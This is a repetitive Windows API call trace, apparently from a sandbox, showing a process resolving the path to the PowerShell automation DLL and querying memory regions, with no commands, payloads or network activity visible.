	[0338.970] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14be90, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0338.970] VirtualQuery (in: lpAddress=0x14bcd0, lpBuffer=0x14cb90, dwLength=0x30 | out: lpBuffer=0x14cb90*(BaseAddress=0x14b000, AllocationBase=0xd0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0338.970] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14c490, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0338.971] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14c3e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0338.971] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14c3e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0338.971] VirtualQuery (in: lpAddress=0x14bcd0, lpBuffer=0x14cb90, dwLength=0x30 | out: lpBuffer=0x14cb90*(BaseAddress=0x14b000, AllocationBase=0xd0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0338.971] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14c850, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0338.971] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14c7a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0338.971] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14c7a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0338.971] VirtualQuery (in: lpAddress=0x14b3c0, lpBuffer=0x14c280, dwLength=0x30 | out: lpBuffer=0x14c280*(BaseAddress=0x14b000, AllocationBase=0xd0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0338.971] VirtualQuery (in: lpAddress=0x14b450, lpBuffer=0x14c310, dwLength=0x30 | out: lpBuffer=0x14c310*(BaseAddress=0x14b000, AllocationBase=0xd0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0338.972] VirtualQuery (in: lpAddress=0x14bb30, lpBuffer=0x14c9f0, dwLength=0x30 | out: lpBuffer=0x14c9f0*(BaseAddress=0x14b000, AllocationBase=0xd0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0338.972] VirtualQuery (in: lpAddress=0x14bbc0, lpBuffer=0x14ca80, dwLength=0x30 | out: lpBuffer=0x14ca80*(BaseAddress=0x14b000, AllocationBase=0xd0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0338.972] VirtualQuery (in: lpAddress=0x14bb30, lpBuffer=0x14c9f0, dwLength=0x30 | out: lpBuffer=0x14c9f0*(BaseAddress=0x14b000, AllocationBase=0xd0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0338.972] VirtualQuery (in: lpAddress=0x14bbc0, lpBuffer=0x14ca80, dwLength=0x30 | out: lpBuffer=0x14ca80*(BaseAddress=0x14b000, AllocationBase=0xd0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0338.972] VirtualQuery (in: lpAddress=0x14bbc0, lpBuffer=0x14ca80, dwLength=0x30 | out: lpBuffer=0x14ca80*(BaseAddress=0x14b000, AllocationBase=0xd0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0338.972] VirtualQuery (in: lpAddress=0x14bb30, lpBuffer=0x14c9f0, dwLength=0x30 | out: lpBuffer=0x14c9f0*(BaseAddress=0x14b000, AllocationBase=0xd0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0338.973] VirtualQuery (in: lpAddress=0x14bbc0, lpBuffer=0x14ca80, dwLength=0x30 | out: lpBuffer=0x14ca80*(BaseAddress=0x14b000, AllocationBase=0xd0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0338.973] VirtualQuery (in: lpAddress=0x14bb30, lpBuffer=0x14c9f0, dwLength=0x30 | out: lpBuffer=0x14c9f0*(BaseAddress=0x14b000, AllocationBase=0xd0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0338.973] VirtualQuery (in: lpAddress=0x14bbc0, lpBuffer=0x14ca80, dwLength=0x30 | out: lpBuffer=0x14ca80*(BaseAddress=0x14b000, AllocationBase=0xd0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0339.340] VirtualQuery (in: lpAddress=0x14bb30, lpBuffer=0x14c9f0, dwLength=0x30 | out: lpBuffer=0x14c9f0*(BaseAddress=0x14b000, AllocationBase=0xd0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0xfffff800)) returned 0x30
	[0339.340] VirtualQuery (in: lpAddress=0x14bbc0, lpBuffer=0x14ca80, dwLength=0x30 | out: lpBuffer=0x14ca80*(BaseAddress=0x14b000, AllocationBase=0xd0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0xfffff800)) returned 0x30
	[0339.340] VirtualQuery (in: lpAddress=0x14b800, lpBuffer=0x14c6c0, dwLength=0x30 | out: lpBuffer=0x14c6c0*(BaseAddress=0x14b000, AllocationBase=0xd0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0xfffff800)) returned 0x30
	[0339.340] VirtualQuery (in: lpAddress=0x14bb30, lpBuffer=0x14c9f0, dwLength=0x30 | out: lpBuffer=0x14c9f0*(BaseAddress=0x14b000, AllocationBase=0xd0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0xfffff800)) returned 0x30
	[0339.341] VirtualQuery (in: lpAddress=0x14bbc0, lpBuffer=0x14ca80, dwLength=0x30 | out: lpBuffer=0x14ca80*(BaseAddress=0x14b000, AllocationBase=0xd0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0xfffff800)) returned 0x30
	[0339.341] VirtualQuery (in: lpAddress=0x14bb30, lpBuffer=0x14c9f0, dwLength=0x30 | out: lpBuffer=0x14c9f0*(BaseAddress=0x14b000, AllocationBase=0xd0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0xfffff800)) returned 0x30
	[0339.341] VirtualQuery (in: lpAddress=0x14bbc0, lpBuffer=0x14ca80, dwLength=0x30 | out: lpBuffer=0x14ca80*(BaseAddress=0x14b000, AllocationBase=0xd0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0xfffff800)) returned 0x30
	[0339.341] CoCreateGuid (in: pguid=0x14d3b0 | out: pguid=0x14d3b0*(Data1=0x4ba3ea99, Data2=0xbc6b, Data3=0x4f29, Data4=([0]=0xbb, [1]=0xa9, [2]=0x8c, [3]=0x40, [4]=0xa5, [5]=0x7a, [6]=0xe3, [7]=0x5d))) returned 0x0
	[0339.341] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14c850, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0339.341] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14c7a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0339.342] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14c7a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0339.342] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14c850, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0339.342] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14c7a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0339.342] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14c7a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0339.342] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14c850, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0339.342] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14c7a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0339.342] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14c7a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0339.343] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14c850, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0339.343] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14c7a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0339.343] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14c7a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0339.343] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14c850, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0339.343] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14c7a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0339.343] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14c7a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0339.344] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14c850, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0339.344] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14c7a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0339.344] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14c7a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0339.344] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14c850, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0339.344] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14c7a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0339.344] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14c7a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0339.344] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14c850, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0339.345] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14c7a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0339.345] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14c7a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0339.345] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14c850, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0339.345] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14c7a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0339.345] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14c7a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0339.345] VirtualQuery (in: lpAddress=0x14b3c0, lpBuffer=0x14c280, dwLength=0x30 | out: lpBuffer=0x14c280*(BaseAddress=0x14b000, AllocationBase=0xd0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0xfffff800)) returned 0x30
	[0339.346] VirtualQuery (in: lpAddress=0x14b450, lpBuffer=0x14c310, dwLength=0x30 | out: lpBuffer=0x14c310*(BaseAddress=0x14b000, AllocationBase=0xd0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0xfffff800)) returned 0x30
	[0339.346] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14c520, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0339.346] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14c470, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0339.346] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14c470, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0339.346] VirtualQuery (in: lpAddress=0x14b670, lpBuffer=0x14c530, dwLength=0x30 | out: lpBuffer=0x14c530*(BaseAddress=0x14b000, AllocationBase=0xd0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0xfffff800)) returned 0x30
	[0339.346] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14c520, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0339.346] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14c470, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0339.347] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14c470, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0339.347] CoCreateGuid (in: pguid=0x14d3b0 | out: pguid=0x14d3b0*(Data1=0x4fb60866, Data2=0x2ba0, Data3=0x47d7, Data4=([0]=0xba, [1]=0x7d, [2]=0x78, [3]=0x0, [4]=0x63, [5]=0x9b, [6]=0x59, [7]=0xa3))) returned 0x0
	[0339.347] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14c850, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0339.347] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14c7a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0339.347] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14c7a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0339.347] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14c850, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0339.347] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14c7a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0339.347] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14c7a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0339.348] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14c850, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0339.348] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14c7a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
